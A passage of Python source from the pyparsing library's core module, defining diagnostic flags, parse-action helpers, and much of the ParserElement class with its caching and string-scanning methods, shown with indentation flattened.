class __compat__(__config_flags):
"""
A cross-version compatibility configuration for pyparsing features that will be
released in a future version. By setting values in this configuration to True,
those features can be enabled in prior versions for compatibility development
and testing.
- ``collect_all_And_tokens`` - flag to enable fix for Issue #63 that fixes erroneous grouping
of results names when an :class:`And` expression is nested within an :class:`Or` or :class:`MatchFirst`;
maintained for compatibility, but setting to ``False`` no longer restores pre-2.3.1
behavior
"""
_type_desc = "compatibility"
collect_all_And_tokens = True
_all_names = [__ for __ in locals() if not __.startswith("_")]
_fixed_names = """
collect_all_And_tokens
""".split()
class __diag__(__config_flags):
_type_desc = "diagnostic"
warn_multiple_tokens_in_named_alternation = False
warn_ungrouped_named_tokens_in_collection = False
warn_name_set_on_empty_Forward = False
warn_on_parse_using_empty_Forward = False
warn_on_assignment_to_Forward = False
warn_on_multiple_string_args_to_oneof = False
warn_on_match_first_with_lshift_operator = False
enable_debug_on_named_expressions = False
_all_names = [__ for __ in locals() if not __.startswith("_")]
_warning_names = [name for name in _all_names if name.startswith("warn")]
_debug_names = [name for name in _all_names if name.startswith("enable_debug")]
@classmethod
def enable_all_warnings(cls):
for name in cls._warning_names:
cls.enable(name)
class Diagnostics(Enum):
"""
Diagnostic configuration (all default to disabled)
- ``warn_multiple_tokens_in_named_alternation`` - flag to enable warnings when a results
name is defined on a :class:`MatchFirst` or :class:`Or` expression with one or more :class:`And` subexpressions
- ``warn_ungrouped_named_tokens_in_collection`` - flag to enable warnings when a results
name is defined on a containing expression with ungrouped subexpressions that also
have results names
- ``warn_name_set_on_empty_Forward`` - flag to enable warnings when a :class:`Forward` is defined
with a results name, but has no contents defined
- ``warn_on_parse_using_empty_Forward`` - flag to enable warnings when a :class:`Forward` is
defined in a grammar but has never had an expression attached to it
- ``warn_on_assignment_to_Forward`` - flag to enable warnings when a :class:`Forward` is defined
but is overwritten by assigning using ``'='`` instead of ``'<<='`` or ``'<<'``
- ``warn_on_multiple_string_args_to_oneof`` - flag to enable warnings when :class:`one_of` is
incorrectly called with multiple str arguments
- ``enable_debug_on_named_expressions`` - flag to auto-enable debug on all subsequent
calls to :class:`ParserElement.set_name`
Diagnostics are enabled/disabled by calling :class:`enable_diag` and :class:`disable_diag`.
All warnings can be enabled by calling :class:`enable_all_warnings`.
"""
warn_multiple_tokens_in_named_alternation = 0
warn_ungrouped_named_tokens_in_collection = 1
warn_name_set_on_empty_Forward = 2
warn_on_parse_using_empty_Forward = 3
warn_on_assignment_to_Forward = 4
warn_on_multiple_string_args_to_oneof = 5
warn_on_match_first_with_lshift_operator = 6
enable_debug_on_named_expressions = 7
def enable_diag(diag_enum):
"""
Enable a global pyparsing diagnostic flag (see :class:`Diagnostics`).
"""
__diag__.enable(diag_enum.name)
def disable_diag(diag_enum):
"""
Disable a global pyparsing diagnostic flag (see :class:`Diagnostics`).
"""
__diag__.disable(diag_enum.name)
def enable_all_warnings():
"""
Enable all global pyparsing diagnostic warnings (see :class:`Diagnostics`).
"""
__diag__.enable_all_warnings()
# hide abstract class
del __config_flags
def _should_enable_warnings(
cmd_line_warn_options: List[str], warn_env_var: OptionalType[str]
) -> bool:
enable = bool(warn_env_var)
for warn_opt in cmd_line_warn_options:
w_action, w_message, w_category, w_module, w_line = (warn_opt + "::::").split(
":"
)[:5]
if not w_action.lower().startswith("i") and (
not (w_message or w_category or w_module) or w_module == "pyparsing"
):
enable = True
elif w_action.lower().startswith("i") and w_module in ("pyparsing", ""):
enable = False
return enable
if _should_enable_warnings(
sys.warnoptions, os.environ.get("PYPARSINGENABLEALLWARNINGS")
):
enable_all_warnings()
# build list of single arg builtins, that can be used as parse actions
_single_arg_builtins = {
sum,
len,
sorted,
reversed,
list,
tuple,
set,
any,
all,
min,
max,
}
_generatorType = types.GeneratorType
ParseAction = Union[
Callable[[], Any],
Callable[[ParseResults], Any],
Callable[[int, ParseResults], Any],
Callable[[str, int, ParseResults], Any],
]
ParseCondition = Union[
Callable[[], bool],
Callable[[ParseResults], bool],
Callable[[int, ParseResults], bool],
Callable[[str, int, ParseResults], bool],
]
ParseFailAction = Callable[[str, int, "ParserElement", Exception], None]
DebugStartAction = Callable[[str, int, "ParserElement", bool], None]
DebugSuccessAction = Callable[
[str, int, int, "ParserElement", ParseResults, bool], None
]
DebugExceptionAction = Callable[[str, int, "ParserElement", Exception, bool], None]
alphas = string.ascii_uppercase + string.ascii_lowercase
identchars = pyparsing_unicode.Latin1.identchars
identbodychars = pyparsing_unicode.Latin1.identbodychars
nums = "0123456789"
hexnums = nums + "ABCDEFabcdef"
alphanums = alphas + nums
printables = "".join(c for c in string.printable if c not in string.whitespace)
_trim_arity_call_line = None
def _trim_arity(func, maxargs=2):
"""decorator to trim function calls to match the arity of the target"""
global _trim_arity_call_line
if func in _single_arg_builtins:
return lambda s, l, t: func(t)
limit = 0
found_arity = False
def extract_tb(tb, limit=0):
frames = traceback.extract_tb(tb, limit=limit)
frame_summary = frames[-1]
return [frame_summary[:2]]
# synthesize what would be returned by traceback.extract_stack at the call to
# user's parse action 'func', so that we don't incur call penalty at parse time
LINE_DIFF = 11
# IF ANY CODE CHANGES, EVEN JUST COMMENTS OR BLANK LINES, BETWEEN THE NEXT LINE AND
# THE CALL TO FUNC INSIDE WRAPPER, LINE_DIFF MUST BE MODIFIED!!!!
_trim_arity_call_line = (
_trim_arity_call_line or traceback.extract_stack(limit=2)[-1]
)
pa_call_line_synth = (
_trim_arity_call_line[0],
_trim_arity_call_line[1] + LINE_DIFF,
)
def wrapper(*args):
nonlocal found_arity, limit
while 1:
try:
ret = func(*args[limit:])
found_arity = True
return ret
except TypeError as te:
# re-raise TypeErrors if they did not come from our arity testing
if found_arity:
raise
else:
tb = te.__traceback__
trim_arity_type_error = (
extract_tb(tb, limit=2)[-1][:2] == pa_call_line_synth
)
del tb
if trim_arity_type_error:
if limit <= maxargs:
limit += 1
continue
raise
# copy func name to wrapper for sensible debug output
# (can't use functools.wraps, since that messes with function signature)
func_name = getattr(func, "__name__", getattr(func, "__class__").__name__)
wrapper.__name__ = func_name
return wrapper
def condition_as_parse_action(
fn: ParseCondition, message: str = None, fatal: bool = False
):
"""
Function to convert a simple predicate function that returns ``True`` or ``False``
into a parse action. Can be used in places when a parse action is required
and :class:`ParserElement.add_condition` cannot be used (such as when adding a condition
to an operator level in :class:`infix_notation`).
Optional keyword arguments:
- ``message`` - define a custom message to be used in the raised exception
- ``fatal`` - if True, will raise :class:`ParseFatalException` to stop parsing immediately;
otherwise will raise :class:`ParseException`
"""
msg = message if message is not None else "failed user-defined condition"
exc_type = ParseFatalException if fatal else ParseException
fn = _trim_arity(fn)
@wraps(fn)
def pa(s, l, t):
if not bool(fn(s, l, t)):
raise exc_type(s, l, msg)
return pa
def _default_start_debug_action(
instring: str, loc: int, expr: "ParserElement", cache_hit: bool = False
):
cache_hit_str = "*" if cache_hit else ""
print(
(
"{}Match {} at loc {}({},{})\n {}\n {}^".format(
cache_hit_str,
expr,
loc,
lineno(loc, instring),
col(loc, instring),
line(loc, instring),
" " * (col(loc, instring) - 1),
)
)
)
def _default_success_debug_action(
instring: str,
startloc: int,
endloc: int,
expr: "ParserElement",
toks: ParseResults,
cache_hit: bool = False,
):
cache_hit_str = "*" if cache_hit else ""
print("{}Matched {} -> {}".format(cache_hit_str, expr, toks.as_list()))
def _default_exception_debug_action(
instring: str,
loc: int,
expr: "ParserElement",
exc: Exception,
cache_hit: bool = False,
):
cache_hit_str = "*" if cache_hit else ""
print(
"{}Match {} failed, {} raised: {}".format(
cache_hit_str, expr, type(exc).__name__, exc
)
)
def null_debug_action(*args):
"""'Do-nothing' debug action, to suppress debugging output during parsing."""
class ParserElement(ABC):
"""Abstract base level parser element class."""
DEFAULT_WHITE_CHARS: str = " \n\t\r"
verbose_stacktrace: bool = False
_literalStringClass: OptionalType[type] = None
@staticmethod
def set_default_whitespace_chars(chars: str):
r"""
Overrides the default whitespace chars
Example::
# default whitespace chars are space, <TAB> and newline
OneOrMore(Word(alphas)).parse_string("abc def\nghi jkl") # -> ['abc', 'def', 'ghi', 'jkl']
# change to just treat newline as significant
ParserElement.set_default_whitespace_chars(" \t")
OneOrMore(Word(alphas)).parse_string("abc def\nghi jkl") # -> ['abc', 'def']
"""
ParserElement.DEFAULT_WHITE_CHARS = chars
# update whitespace all parse expressions defined in this module
for expr in _builtin_exprs:
if expr.copyDefaultWhiteChars:
expr.whiteChars = set(chars)
@staticmethod
def inline_literals_using(cls: type):
"""
Set class to be used for inclusion of string literals into a parser.
Example::
# default literal class used is Literal
integer = Word(nums)
date_str = integer("year") + '/' + integer("month") + '/' + integer("day")
date_str.parse_string("1999/12/31") # -> ['1999', '/', '12', '/', '31']
# change to Suppress
ParserElement.inline_literals_using(Suppress)
date_str = integer("year") + '/' + integer("month") + '/' + integer("day")
date_str.parse_string("1999/12/31") # -> ['1999', '12', '31']
"""
ParserElement._literalStringClass = cls
def __init__(self, savelist: bool = False):
self.parseAction: List[ParseAction] = list()
self.failAction: OptionalType[ParseFailAction] = None
self.customName = None
self._defaultName = None
self.resultsName = None
self.saveAsList = savelist
self.skipWhitespace = True
self.whiteChars = set(ParserElement.DEFAULT_WHITE_CHARS)
self.copyDefaultWhiteChars = True
# used when checking for left-recursion
self.mayReturnEmpty = False
self.keepTabs = False
self.ignoreExprs: List["ParserElement"] = list()
self.debug = False
self.streamlined = False
# optimize exception handling for subclasses that don't advance parse index
self.mayIndexError = True
self.errmsg = ""
# mark results names as modal (report only last) or cumulative (list all)
self.modalResults = True
# custom debug actions
self.debugActions: Tuple[
OptionalType[DebugStartAction],
OptionalType[DebugSuccessAction],
OptionalType[DebugExceptionAction],
] = (None, None, None)
self.re = None
# avoid redundant calls to preParse
self.callPreparse = True
self.callDuringTry = False
self.suppress_warnings_ = []
def suppress_warning(self, warning_type: Diagnostics):
"""
Suppress warnings emitted for a particular diagnostic on this expression.
Example::
base = pp.Forward()
base.suppress_warning(Diagnostics.warn_on_parse_using_empty_Forward)
# statement would normally raise a warning, but is now suppressed
print(base.parseString("x"))
"""
self.suppress_warnings_.append(warning_type)
return self
def copy(self) -> "ParserElement":
"""
Make a copy of this :class:`ParserElement`. Useful for defining
different parse actions for the same parsing pattern, using copies of
the original parse element.
Example::
integer = Word(nums).set_parse_action(lambda toks: int(toks[0]))
integerK = integer.copy().add_parse_action(lambda toks: toks[0] * 1024) + Suppress("K")
integerM = integer.copy().add_parse_action(lambda toks: toks[0] * 1024 * 1024) + Suppress("M")
print(OneOrMore(integerK | integerM | integer).parse_string("5K 100 640K 256M"))
prints::
[5120, 100, 655360, 268435456]
Equivalent form of ``expr.copy()`` is just ``expr()``::
integerM = integer().add_parse_action(lambda toks: toks[0] * 1024 * 1024) + Suppress("M")
"""
cpy = copy.copy(self)
cpy.parseAction = self.parseAction[:]
cpy.ignoreExprs = self.ignoreExprs[:]
if self.copyDefaultWhiteChars:
cpy.whiteChars = set(ParserElement.DEFAULT_WHITE_CHARS)
return cpy
def set_results_name(
self, name: str, list_all_matches: bool = False, *, listAllMatches: bool = False
) -> "ParserElement":
"""
Define name for referencing matching tokens as a nested attribute
of the returned parse results.
Normally, results names are assigned as you would assign keys in a dict:
any existing value is overwritten by later values. If it is necessary to
keep all values captured for a particular results name, call ``set_results_name``
with ``list_all_matches`` = True.
NOTE: ``set_results_name`` returns a *copy* of the original :class:`ParserElement` object;
this is so that the client can define a basic element, such as an
integer, and reference it in multiple places with different names.
You can also set results names using the abbreviated syntax,
``expr("name")`` in place of ``expr.set_results_name("name")``
- see :class:`__call__`. If ``list_all_matches`` is required, use
``expr("name*")``.
Example::
date_str = (integer.set_results_name("year") + '/'
+ integer.set_results_name("month") + '/'
+ integer.set_results_name("day"))
# equivalent form:
date_str = integer("year") + '/' + integer("month") + '/' + integer("day")
"""
listAllMatches = listAllMatches or list_all_matches
return self._setResultsName(name, listAllMatches)
def _setResultsName(self, name, listAllMatches=False):
if name is None:
return self
newself = self.copy()
if name.endswith("*"):
name = name[:-1]
listAllMatches = True
newself.resultsName = name
newself.modalResults = not listAllMatches
return newself
def set_break(self, break_flag: bool = True) -> "ParserElement":
"""
Method to invoke the Python pdb debugger when this element is
about to be parsed. Set ``break_flag`` to ``True`` to enable, ``False`` to
disable.
"""
if break_flag:
_parseMethod = self._parse
def breaker(instring, loc, doActions=True, callPreParse=True):
import pdb
# this call to pdb.set_trace() is intentional, not a checkin error
pdb.set_trace()
return _parseMethod(instring, loc, doActions, callPreParse)
breaker._originalParseMethod = _parseMethod
self._parse = breaker
else:
if hasattr(self._parse, "_originalParseMethod"):
self._parse = self._parse._originalParseMethod
return self
def set_parse_action(
self, *fns: ParseAction, **kwargs
) -> OptionalType["ParserElement"]:
"""
Define one or more actions to perform when successfully matching parse element definition.
Parse actions can be called to perform data conversions, do extra validation,
update external data structures, or enhance or replace the parsed tokens.
Each parse action ``fn`` is a callable method with 0-3 arguments, called as
``fn(s, loc, toks)`` , ``fn(loc, toks)`` , ``fn(toks)`` , or just ``fn()`` , where:
- s = the original string being parsed (see note below)
- loc = the location of the matching substring
- toks = a list of the matched tokens, packaged as a :class:`ParseResults` object
The parsed tokens are passed to the parse action as ParseResults. They can be
modified in place using list-style append, extend, and pop operations to update
the parsed list elements; and with dictionary-style item set and del operations
to add, update, or remove any named results. If the tokens are modified in place,
it is not necessary to return them with a return statement.
Parse actions can also completely replace the given tokens, with another ``ParseResults``
object, or with some entirely different object (common for parse actions that perform data
conversions). A convenient way to build a new parse result is to define the values
using a dict, and then create the return value using :class:`ParseResults.from_dict`.
If None is passed as the ``fn`` parse action, all previously added parse actions for this
expression are cleared.
Optional keyword arguments:
- call_during_try = (default= ``False``) indicate if parse action should be run during
lookaheads and alternate testing. For parse actions that have side effects, it is
important to only call the parse action once it is determined that it is being
called as part of a successful parse. For parse actions that perform additional
validation, then call_during_try should be passed as True, so that the validation
code is included in the preliminary "try" parses.
Note: the default parsing behavior is to expand tabs in the input string
before starting the parsing process. See :class:`parse_string` for more
information on parsing strings containing ``<TAB>`` s, and suggested
methods to maintain a consistent view of the parsed string, the parse
location, and line and column positions within the parsed string.
Example::
# parse dates in the form YYYY/MM/DD
# use parse action to convert toks from str to int at parse time
def convert_to_int(toks):
return int(toks[0])
# use a parse action to verify that the date is a valid date
def is_valid_date(toks):
from datetime import date
year, month, day = toks[::2]
try:
date(year, month, day)
except ValueError:
raise ParseException("invalid date given")
integer = Word(nums)
date_str = integer + '/' + integer + '/' + integer
# add parse actions
integer.set_parse_action(convert_to_int)
date_str.set_parse_action(is_valid_date)
# note that integer fields are now ints, not strings
date_str.run_tests('''
# successful parse - note that integer fields were converted to ints
1999/12/31
# fail - invalid date
1999/13/31
''')
"""
if list(fns) == [None]:
self.parseAction = []
else:
if not all(callable(fn) for fn in fns):
raise TypeError("parse actions must be callable")
self.parseAction = list(map(_trim_arity, list(fns)))
self.callDuringTry = kwargs.get(
"call_during_try", kwargs.get("callDuringTry", False)
)
return self
def add_parse_action(self, *fns: ParseAction, **kwargs) -> "ParserElement":
"""
Add one or more parse actions to expression's list of parse actions. See :class:`set_parse_action`.
See examples in :class:`copy`.
"""
self.parseAction += list(map(_trim_arity, list(fns)))
self.callDuringTry = self.callDuringTry or kwargs.get(
"call_during_try", kwargs.get("callDuringTry", False)
)
return self
def add_condition(self, *fns: ParseCondition, **kwargs) -> "ParserElement":
"""Add a boolean predicate function to expression's list of parse actions. See
:class:`set_parse_action` for function call signatures. Unlike ``set_parse_action``,
functions passed to ``add_condition`` need to return boolean success/fail of the condition.
Optional keyword arguments:
- message = define a custom message to be used in the raised exception
- fatal = if True, will raise ParseFatalException to stop parsing immediately; otherwise will raise
ParseException
- call_during_try = boolean to indicate if this method should be called during internal tryParse calls,
default=False
Example::
integer = Word(nums).set_parse_action(lambda toks: int(toks[0]))
year_int = integer.copy()
year_int.add_condition(lambda toks: toks[0] >= 2000, message="Only support years 2000 and later")
date_str = year_int + '/' + integer + '/' + integer
result = date_str.parse_string("1999/12/31") # -> Exception: Only support years 2000 and later (at char 0),
(line:1, col:1)
"""
for fn in fns:
self.parseAction.append(
condition_as_parse_action(
fn, message=kwargs.get("message"), fatal=kwargs.get("fatal", False)
)
)
self.callDuringTry = self.callDuringTry or kwargs.get(
"call_during_try", kwargs.get("callDuringTry", False)
)
return self
def set_fail_action(self, fn: ParseFailAction) -> "ParserElement":
"""
Define action to perform if parsing fails at this expression.
Fail acton fn is a callable function that takes the arguments
``fn(s, loc, expr, err)`` where:
- s = string being parsed
- loc = location where expression match was attempted and failed
- expr = the parse expression that failed
- err = the exception thrown
The function returns no value. It may throw :class:`ParseFatalException`
if it is desired to stop parsing immediately."""
self.failAction = fn
return self
def _skipIgnorables(self, instring, loc):
exprsFound = True
while exprsFound:
exprsFound = False
for e in self.ignoreExprs:
try:
while 1:
loc, dummy = e._parse(instring, loc)
exprsFound = True
except ParseException:
pass
return loc
def preParse(self, instring, loc):
if self.ignoreExprs:
loc = self._skipIgnorables(instring, loc)
if self.skipWhitespace:
instrlen = len(instring)
white_chars = self.whiteChars
while loc < instrlen and instring[loc] in white_chars:
loc += 1
return loc
def parseImpl(self, instring, loc, doActions=True):
return loc, []
def postParse(self, instring, loc, tokenlist):
return tokenlist
# @profile
def _parseNoCache(
self, instring, loc, doActions=True, callPreParse=True
) -> Tuple[int, ParseResults]:
TRY, MATCH, FAIL = 0, 1, 2
debugging = self.debug # and doActions)
len_instring = len(instring)
if debugging or self.failAction:
# print("Match {} at loc {}({}, {})".format(self, loc, lineno(loc, instring), col(loc, instring)))
try:
if callPreParse and self.callPreparse:
pre_loc = self.preParse(instring, loc)
else:
pre_loc = loc
tokens_start = pre_loc
if self.debugActions[TRY]:
self.debugActions[TRY](instring, tokens_start, self)
if self.mayIndexError or pre_loc >= len_instring:
try:
loc, tokens = self.parseImpl(instring, pre_loc, doActions)
except IndexError:
raise ParseException(instring, len_instring, self.errmsg, self)
else:
loc, tokens = self.parseImpl(instring, pre_loc, doActions)
except Exception as err:
# print("Exception raised:", err)
if self.debugActions[FAIL]:
self.debugActions[FAIL](instring, tokens_start, self, err)
if self.failAction:
self.failAction(instring, tokens_start, self, err)
raise
else:
if callPreParse and self.callPreparse:
pre_loc = self.preParse(instring, loc)
else:
pre_loc = loc
tokens_start = pre_loc
if self.mayIndexError or pre_loc >= len_instring:
try:
loc, tokens = self.parseImpl(instring, pre_loc, doActions)
except IndexError:
raise ParseException(instring, len_instring, self.errmsg, self)
else:
loc, tokens = self.parseImpl(instring, pre_loc, doActions)
tokens = self.postParse(instring, loc, tokens)
ret_tokens = ParseResults(
tokens, self.resultsName, asList=self.saveAsList, modal=self.modalResults
)
if self.parseAction and (doActions or self.callDuringTry):
if debugging:
try:
for fn in self.parseAction:
try:
tokens = fn(instring, tokens_start, ret_tokens)
except IndexError as parse_action_exc:
exc = ParseException("exception raised in parse action")
raise exc from parse_action_exc
if tokens is not None and tokens is not ret_tokens:
ret_tokens = ParseResults(
tokens,
self.resultsName,
asList=self.saveAsList
and isinstance(tokens, (ParseResults, list)),
modal=self.modalResults,
)
except Exception as err:
# print "Exception raised in user parse action:", err
if self.debugActions[FAIL]:
self.debugActions[FAIL](instring, tokens_start, self, err)
raise
else:
for fn in self.parseAction:
try:
tokens = fn(instring, tokens_start, ret_tokens)
except IndexError as parse_action_exc:
exc = ParseException("exception raised in parse action")
raise exc from parse_action_exc
if tokens is not None and tokens is not ret_tokens:
ret_tokens = ParseResults(
tokens,
self.resultsName,
asList=self.saveAsList
and isinstance(tokens, (ParseResults, list)),
modal=self.modalResults,
)
if debugging:
# print("Matched", self, "->", ret_tokens.as_list())
if self.debugActions[MATCH]:
self.debugActions[MATCH](instring, tokens_start, loc, self, ret_tokens)
return loc, ret_tokens
def try_parse(self, instring: str, loc: int, raise_fatal: bool = False) -> int:
try:
return self._parse(instring, loc, doActions=False)[0]
except ParseFatalException:
if raise_fatal:
raise
raise ParseException(instring, loc, self.errmsg, self)
def can_parse_next(self, instring: str, loc: int) -> bool:
try:
self.try_parse(instring, loc)
except (ParseException, IndexError):
return False
else:
return True
# cache for left-recursion in Forward references
recursion_lock = RLock()
recursion_memos: DictType[
Tuple[int, "Forward", bool], Tuple[int, Union[ParseResults, Exception]]
] = {}
# argument cache for optimizing repeated calls when backtracking through recursive expressions
packrat_cache = (
{}
) # this is set later by enabled_packrat(); this is here so that reset_cache() doesn't fail
packrat_cache_lock = RLock()
packrat_cache_stats = [0, 0]
# this method gets repeatedly called during backtracking with the same arguments -
# we can cache these arguments and save ourselves the trouble of re-parsing the contained expression
def _parseCache(
self, instring, loc, doActions=True, callPreParse=True
) -> Tuple[int, ParseResults]:
HIT, MISS = 0, 1
TRY, MATCH, FAIL = 0, 1, 2
lookup = (self, instring, loc, callPreParse, doActions)
with ParserElement.packrat_cache_lock:
cache = ParserElement.packrat_cache
value = cache.get(lookup)
if value is cache.not_in_cache:
ParserElement.packrat_cache_stats[MISS] += 1
try:
value = self._parseNoCache(instring, loc, doActions, callPreParse)
except ParseBaseException as pe:
# cache a copy of the exception, without the traceback
cache.set(lookup, pe.__class__(*pe.args))
raise
else:
cache.set(lookup, (value[0], value[1].copy(), loc))
return value
else:
ParserElement.packrat_cache_stats[HIT] += 1
if self.debug and self.debugActions[TRY]:
try:
self.debugActions[TRY](instring, loc, self, cache_hit=True)
except TypeError:
pass
if isinstance(value, Exception):
if self.debug and self.debugActions[FAIL]:
try:
self.debugActions[FAIL](
instring, loc, self, value, cache_hit=True
)
except TypeError:
pass
raise value
loc_, result, endloc = value[0], value[1].copy(), value[2]
if self.debug and self.debugActions[MATCH]:
try:
self.debugActions[MATCH](
instring, loc_, endloc, self, result, cache_hit=True
)
except TypeError:
pass
return loc_, result
_parse = _parseNoCache
@staticmethod
def reset_cache() -> None:
ParserElement.packrat_cache.clear()
ParserElement.packrat_cache_stats[:] = [0] * len(
ParserElement.packrat_cache_stats
)
ParserElement.recursion_memos.clear()
_packratEnabled = False
_left_recursion_enabled = False
@staticmethod
def disable_memoization() -> None:
"""
Disables active Packrat or Left Recursion parsing and their memoization
This method also works if neither Packrat nor Left Recursion are enabled.
This makes it safe to call before activating Packrat nor Left Recursion
to clear any previous settings.
"""
ParserElement.reset_cache()
ParserElement._left_recursion_enabled = False
ParserElement._packratEnabled = False
ParserElement._parse = ParserElement._parseNoCache
@staticmethod
def enable_left_recursion(
cache_size_limit: OptionalType[int] = None, *, force=False
) -> None:
"""
Enables "bounded recursion" parsing, which allows for both direct and indirect
left-recursion. During parsing, left-recursive :class:`Forward` elements are
repeatedly matched with a fixed recursion depth that is gradually increased
until finding the longest match.
Example::
import pyparsing as pp
pp.ParserElement.enable_left_recursion()
E = pp.Forward("E")
num = pp.Word(pp.nums)
# match `num`, or `num '+' num`, or `num '+' num '+' num`, ...
E <<= E + '+' - num | num
print(E.parse_string("1+2+3"))
Recursion search naturally memoizes matches of ``Forward`` elements and may
thus skip reevaluation of parse actions during backtracking. This may break
programs with parse actions which rely on strict ordering of side-effects.
Parameters:
- cache_size_limit - (default=``None``) - memoize at most this many
``Forward`` elements during matching; if ``None`` (the default),
memoize all ``Forward`` elements.
Bounded Recursion parsing works similar but not identical to Packrat parsing,
thus the two cannot be used together. Use ``force=True`` to disable any
previous, conflicting settings.
"""
if force:
ParserElement.disable_memoization()
elif ParserElement._packratEnabled:
raise RuntimeError("Packrat and Bounded Recursion are not compatible")
if cache_size_limit is None:
ParserElement.recursion_memos = _UnboundedMemo()
elif cache_size_limit > 0:
ParserElement.recursion_memos = _LRUMemo(capacity=cache_size_limit)
else:
raise NotImplementedError("Memo size of %s" % cache_size_limit)
ParserElement._left_recursion_enabled = True
@staticmethod
def enable_packrat(cache_size_limit: int = 128, *, force: bool = False) -> None:
"""
Enables "packrat" parsing, which adds memoizing to the parsing logic.
Repeated parse attempts at the same string location (which happens
often in many complex grammars) can immediately return a cached value,
instead of re-executing parsing/validating code. Memoizing is done of
both valid results and parsing exceptions.
Parameters:
- cache_size_limit - (default= ``128``) - if an integer value is provided
will limit the size of the packrat cache; if None is passed, then
the cache size will be unbounded; if 0 is passed, the cache will
be effectively disabled.
This speedup may break existing programs that use parse actions that
have side-effects. For this reason, packrat parsing is disabled when
you first import pyparsing. To activate the packrat feature, your
program must call the class method :class:`ParserElement.enable_packrat`.
For best results, call ``enable_packrat()`` immediately after
importing pyparsing.
Example::
import pyparsing
pyparsing.ParserElement.enable_packrat()
Packrat parsing works similar but not identical to Bounded Recursion parsing,
thus the two cannot be used together. Use ``force=True`` to disable any
previous, conflicting settings.
"""
if force:
ParserElement.disable_memoization()
elif ParserElement._left_recursion_enabled:
raise RuntimeError("Packrat and Bounded Recursion are not compatible")
if not ParserElement._packratEnabled:
ParserElement._packratEnabled = True
if cache_size_limit is None:
ParserElement.packrat_cache = _UnboundedCache()
else:
ParserElement.packrat_cache = _FifoCache(cache_size_limit)
ParserElement._parse = ParserElement._parseCache
def parse_string(
self, instring: str, parse_all: bool = False, *, parseAll: bool = False
) -> ParseResults:
"""
Parse a string with respect to the parser definition. This function is intended as the primary interface to the
client code.
:param instring: The input string to be parsed.
:param parse_all: If set, the entire input string must match the grammar.
:param parseAll: retained for pre-PEP8 compatibility, will be removed in a future release.
:raises ParseException: Raised if ``parse_all`` is set and the input string does not match the whole grammar.
:returns: the parsed data as a :class:`ParseResults` object, which may be accessed as a `list`, a `dict`, or
an object with attributes if the given parser includes results names.
If the input string is required to match the entire grammar, ``parse_all`` flag must be set to ``True``. This
is also equivalent to ending the grammar with :class:`StringEnd`().
To report proper column numbers, ``parse_string`` operates on a copy of the input string where all tabs are
converted to spaces (8 spaces per tab, as per the default in ``string.expandtabs``). If the input string
contains tabs and the grammar uses parse actions that use the ``loc`` argument to index into the string
being parsed, one can ensure a consistent view of the input string by doing one of the following:
- calling ``parse_with_tabs`` on your grammar before calling ``parse_string`` (see :class:`parse_with_tabs`),
- define your parse action using the full ``(s,loc,toks)`` signature, and reference the input string using the
parse action's ``s`` argument, or
- explicitly expand the tabs in your input string before calling ``parse_string``.
Examples:
By default, partial matches are OK.
>>> res = Word('a').parse_string('aaaaabaaa')
>>> print(res)
['aaaaa']
The parsing behavior varies by the inheriting class of this abstract class. Please refer to the children
directly to see more examples.
It raises an exception if parse_all flag is set and instring does not match the whole grammar.
>>> res = Word('a').parse_string('aaaaabaaa', parse_all=True)
Traceback (most recent call last):
...
pyparsing.ParseException: Expected end of text, found 'b' (at char 5), (line:1, col:6)
"""
parseAll = parse_all or parseAll
ParserElement.reset_cache()
if not self.streamlined:
self.streamline()
for e in self.ignoreExprs:
e.streamline()
if not self.keepTabs:
instring = instring.expandtabs()
try:
loc, tokens = self._parse(instring, 0)
if parseAll:
loc = self.preParse(instring, loc)
se = Empty() + StringEnd()
se._parse(instring, loc)
except ParseBaseException as exc:
if ParserElement.verbose_stacktrace:
raise
else:
# catch and re-raise exception from here, clearing out pyparsing internal stack trace
raise exc.with_traceback(None)
else:
return tokens
def scan_string(
self,
instring: str,
max_matches: int = _MAX_INT,
overlap: bool = False,
*,
debug: bool = False,
maxMatches: int = _MAX_INT,
) -> Generator[Tuple[ParseResults, int, int], None, None]:
"""
Scan the input string for expression matches. Each match will return the
matching tokens, start location, and end location. May be called with optional
``max_matches`` argument, to clip scanning after 'n' matches are found. If
``overlap`` is specified, then overlapping matches will be reported.
Note that the start and end locations are reported relative to the string
being parsed. See :class:`parse_string` for more information on parsing
strings with embedded tabs.
Example::
source = "sldjf123lsdjjkf345sldkjf879lkjsfd987"
print(source)
for tokens, start, end in Word(alphas).scan_string(source):
print(' '*start + '^'*(end-start))
print(' '*start + tokens[0])
prints::
sldjf123lsdjjkf345sldkjf879lkjsfd987
^^^^^
sldjf
^^^^^^^
lsdjjkf
^^^^^^
sldkjf
^^^^^^
lkjsfd
"""
maxMatches = min(maxMatches, max_matches)
if not self.streamlined:
self.streamline()
for e in self.ignoreExprs:
e.streamline()
if not self.keepTabs:
instring = str(instring).expandtabs()
instrlen = len(instring)
loc = 0
preparseFn = self.preParse
parseFn = self._parse
ParserElement.resetCache()
matches = 0
try:
while loc <= instrlen and matches < maxMatches:
try:
preloc = preparseFn(instring, loc)
nextLoc, tokens = parseFn(instring, preloc, callPreParse=False)
except ParseException:
loc = preloc + 1
else:
if nextLoc > loc:
matches += 1
if debug:
print(
{
"tokens": tokens.asList(),
"start": preloc,
"end": nextLoc,
}
)
yield tokens, preloc, nextLoc
if overlap:
nextloc = preparseFn(instring, loc)
if nextloc > loc:
loc = nextLoc
else:
loc += 1
else:
loc = nextLoc
else:
loc = preloc + 1
except ParseBaseException as exc:
if ParserElement.verbose_stacktrace:
raise
else:
# catch and re-raise exception from here, clears out pyparsing internal stack trace
raise exc.with_traceback(None)
def transform_string(self, instring: str, *, debug: bool = False) -> str:
"""
Extension to :class:`scan_string`, to modify matching text with modified tokens that may
be returned from a parse action. To use ``transform_string``, define a grammar and
attach a parse action to it that modifies the returned token list.
Invoking ``transform_string()`` on a target string will then scan for matches,
and replace the matched text patterns according to the logic in the parse
action. ``transform_string()`` returns the resulting transformed string.
Example::
wd = Word(alphas)
wd.set_parse_action(lambda toks: toks[0].title())
print(wd.transform_string("now is the winter of our discontent made glorious summer by this sun of york."))
prints::
Now Is The Winter Of Our Discontent Made Glorious Summer By This Sun Of York.
"""
out = []
lastE = 0
# force preservation of <TAB>s, to minimize unwanted transformation of string, and to
# keep string locs straight between transform_string and scan_string
self.keepTabs = True
try:
for t, s, e in self.scan_string(instring, debug=debug):
out.append(instring[lastE:s])
if t:
if isinstance(t, ParseResults):
out += t.as_list()
elif isinstance(t, Iterable) and not isinstance(t, str_type):
out += list(t)
else:
out.append(t)
lastE = e
out.append(instring[lastE:])
